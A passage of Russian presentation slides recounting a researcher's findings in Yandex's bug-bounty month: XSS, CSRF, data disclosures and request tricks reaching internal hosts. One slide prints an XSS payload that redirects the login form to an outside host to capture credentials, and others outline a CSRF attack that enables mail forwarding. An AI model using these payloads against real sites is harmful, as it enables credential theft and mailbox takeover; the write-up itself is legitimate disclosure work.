Месяц поиска уязвимостей Яндекса опыт участия Эльдар Заитов @kyprizel. - презентация

1 Месяц поиска уязвимостей Яндекса опыт участия Эльдар

2 Что это было? Что искать: межсайтовый скриптинг (XSS); межсайтовая подделка запросов (CSRF); небезопасное управление сессией; инъекции; ошибки в механизмах аутентификации и авторизации; Где искать: *.yandex.ru, com, com.tr, kz, ua, by, net, st; *.ya.ru. *.moikrug.ru.

3 Почему искать? Интерес Не часто компании такого уровня дают полный карт-бланш в действиях – хочется посмотреть как всё устроено внутри, в случае успешной атаки; Интерес Понять, каков же реальный уровень защищенности сервисов одной из крупнейших IT компаний в России; Деньги В случае победы, $5k неплохой бонус за работу, сделаную ради интереса.

4 Что искал RCE, различные переполняшки; SQL injection; Способы проникновения во внутреннюю инфраструктуру; XSS; CSRF;

5 Как искал Представить, как оно могло бы работать; Сделать легкий ручной fuzzing, посмотреть на реакцию. Где искал mail.yandex.ru

6 Что нашел Пассивные XSS; Некритичные раскрытия данных; Различные бесполезные tricks; CSRF; да, я знаю, что это lame ;)

7 XSS уязвимость Доверенный параметр retpath в passport.yandex.ru

8 XSS exploit Как использовать максимально эффективно? Украсть не сессию, но логин и пароль.

9 window.onload=function() { document.forms['MainLogin'].action='//kyprizel.net/p.php'; }

10 Раскрытия Neo2 XML + Oracle PL/SQL Neo2 handlers

11 Раскрытия Modjs.js …

12

13 Tricks Произвольные GET запросы через Ленту в том числе внутри DMZ: blackbox.yandex.net csearch.mail.yandex.net Сканирование портов через mail collector; nothing interesting :(

14 CSRF ckey Не работающая CSRF защита в интерфейсе neo Как использовать максимально эффективно? - Включить форвардинг писем на свой адрес.

15 CSRF exploit Step 1 confirm/e=Ut7tUs8g8jFFRbI4JOC%2ALUKGjDmZsg%2ANtGNtsYGO66aSjD%2AjgMzkllOOE UyjbUnVLiRMEBkrx34%3D

16

17 CSRF exploit Step 2 PROFIT!

18

19